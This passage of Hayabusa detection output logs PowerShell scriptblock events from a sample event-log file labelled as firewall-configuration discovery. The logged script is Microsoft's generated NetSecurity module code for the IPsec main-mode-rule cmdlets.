+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainMod",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('Po",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"licyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 